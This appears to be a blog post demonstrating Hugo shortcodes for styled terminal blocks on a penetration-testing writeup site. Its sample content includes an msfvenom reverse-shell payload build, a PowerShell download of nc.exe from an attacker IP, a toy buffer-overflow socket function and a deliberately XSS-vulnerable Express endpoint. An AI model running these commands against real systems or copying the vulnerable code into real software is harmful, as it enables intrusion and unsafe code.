This post demonstrates all the custom terminal shortcodes available for creating MacOS-style terminal blocks in your posts.
Attacker Terminal (Orange Header)
Use the attacker shortcode for commands run from your attacking machine. This terminal has an orange header and is perfect for pentesting commands.
Regular user ($):
kali@attacker
kali:~$
nmap -sC -sV -oA scan 10.10.10.237
Root user (#):
root@kali@attacker
root@kali:/opt/tools#
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o payload.exe
Target Terminal (Blue Header)
Use the target shortcode for commands run on the target/victim machine. This terminal has a blue header to distinguish it from attacker commands.
Regular user ($):
www-data@target
www-data:/var/www/html$
ls -la
Root user (#):
root@target
root:/root#
cat /root/flag.txt
Shell Terminal (Generic)
Use the shell shortcode for generic shell commands. This has a lighter MacOS-style header.
Regular user ($):
Shell
$
echo "Hello World"
Root user (#):
Shell
#
systemctl restart apache2
PowerShell Terminal (Windows)
Use the powershell shortcode for Windows PowerShell commands:
Windows PowerShell
PS C:\\Users\\Administrator>
Get-Process | Where-Object {$_.CPU -gt 100}
Windows PowerShell
PS C:\\Windows\\Temp>
Invoke-WebRequest -Uri http://10.10.14.5/nc.exe -OutFile nc.exe
CMD Terminal (Windows Command Prompt)
Use the cmd shortcode for Windows Command Prompt:
Command Prompt
C:\\Windows\\System32>
dir /a
Command Prompt
C:\\inetpub\\wwwroot>
type web.config
SQL Terminal (Database)
Use the sql shortcode for SQL database queries. This terminal has a teal/cyan header.
SQL Terminal
mysql
SELECT * FROM users WHERE admin=1;
SQL Terminal
postgres@db
\dt
Collapsible Output
Use the output shortcode for long command outputs. It’s collapsible to keep your posts clean. Notice the dashed border, italic title with arrow, and “Collapsible Output” label.
Nmap Scan Results
Collapsible Output
Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-11 10:00 EDT Nmap scan report for 10.10.10.237 Host is up (0.045s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 135/tcp open msrpc Microsoft Windows RPC 443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 45.23 seconds
Directory Listing
Collapsible Output
total 48 drwxr-xr-x 5 www-data www-data 4096 Mar 11 10:00 . drwxr-xr-x 12 root root 4096 Jan 15 08:30 .. -rw-r--r-- 1 www-data www-data 220 Jan 15 08:30 .bash_logout -rw-r--r-- 1 www-data www-data 3526 Jan 15 08:30 .bashrc drwxr-xr-x 3 www-data www-data 4096 Jan 15 08:45 .cache -rw-r--r-- 1 www-data www-data 807 Jan 15 08:30 .profile drwxr-xr-x 2 www-data www-data 4096 Mar 11 09:45 uploads -rw-r--r-- 1 www-data www-data 1337 Mar 11 10:00 index.php
Multiple collapsible outputs work independently:
SQL Query Result #1
Collapsible Output
+----+----------+------------------+-------+ | id | username | email | admin | +----+----------+------------------+-------+ | 1 | admin | admin@site.local | 1 | | 5 | dbuser | db@site.local | 1 | +----+----------+------------------+-------+ 2 rows in set (0.00 sec)
SQL Query Result #2
Collapsible Output
+----+---------+-------------------+-------+ | id | user | email | role | +----+---------+-------------------+-------+ | 12 | test | test@example.com | user | | 13 | demo | demo@example.com | user | +----+---------+-------------------+-------+ 2 rows in set (0.01 sec)
Shortcode Usage Reference
Attacker Terminal
{{< attacker prompt="kali" pwd="~" root="false" >}}
your command here
{{< /attacker >}}
Parameters:
prompt: Username (default: “kali@attacker”)pwd: Current working directory (default: “~”)root: Set to “true” for # prompt (default: “false”)
Target Terminal
{{< target prompt="www-data" pwd="/var/www" root="false" >}}
your command here
{{< /target >}}
Parameters:
prompt: Username (default: “victim@target”)pwd: Current working directory (default: “~”)root: Set to “true” for # prompt (default: “false”)
Shell Terminal
{{< shell root="false" >}}
your command here
{{< /shell >}}
Parameters:
prompt: Custom prompt character (default: “$”)root: Set to “true” for # prompt (default: “false”)
PowerShell Terminal
{{< powershell user="Administrator" path="C:\\Users\\Administrator" >}}
your command here
{{< /powershell >}}
Parameters:
user: Username (default: “Administrator”)path: Current path (default: “C:\Users\Administrator”)
CMD Terminal
{{< cmd user="Administrator" path="C:\\Windows\\System32" >}}
your command here
{{< /cmd >}}
Parameters:
user: Username (default: “Administrator”)path: Current path (default: “C:\Users\Administrator”)
SQL Terminal
{{< sql prompt="mysql" >}}
your query here
{{< /sql >}}
Parameters:
prompt: Database prompt (default: “mysql>”)
Collapsible Output
{{< output title="Command Output" collapsed="true" >}}
your output here
{{< /output >}}
Parameters:
title: Header title (default: “Command Output”)collapsed: Initial state, “true” or “false” (default: “true”)id: Unique identifier (auto-generated if not provided)
Syntax Highlighting Examples
Here are some examples showing the Dracula syntax highlighting theme in action:
Python Example
def exploit_vulnerability(target_ip, port=443):
"""Connect to target and exploit buffer overflow"""
payload = b"\x90" * 100 # NOP sled
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, port))
sock.send(payload + shellcode)
return True
except Exception as e:
print(f"Error: {e}")
return False
JavaScript/Node.js Example
const express = require('express');
const app = express();
// Vulnerable endpoint - DO NOT USE IN PRODUCTION
app.get('/search', (req, res) => {
const query = req.query.q; // XSS vulnerability!
res.send(`<h1>Results for: ${query}</h1>`);
});
app.listen(3000, () => {
console.log('Server running on port 3000');
});
Bash Script Example
#!/bin/bash
# Enumeration script for penetration testing
TARGET="10.10.10.1"
PORTS="80,443,8080"
echo "[+] Starting enumeration of $TARGET"
nmap -sC -sV -p $PORTS $TARGET -oN scan.txt
if [ $? -eq 0 ]; then
echo "[+] Scan completed successfully"
cat scan.txt | grep "open"
else
echo "[-] Scan failed"
exit 1
fi
Features
- MacOS-Style Design: Authentic terminal window appearance with colored buttons
- Multiple Terminal Types: Attacker (orange), Target (blue), Shell, PowerShell, CMD, SQL
- Color-Coded Headers: Each terminal type has a distinct header color for easy identification
- Root User Support: Use
root="true"to show # instead of $ for privileged commands - Collapsible Output: Click the header to expand/collapse long outputs, with dashed border and label
- Copy Buttons: All terminals include copy-to-clipboard functionality
- Responsive: Works on mobile devices
- Dark Mode Support: Adapts to site theme
Enjoy using these terminal blocks in your walkthroughs and tutorials!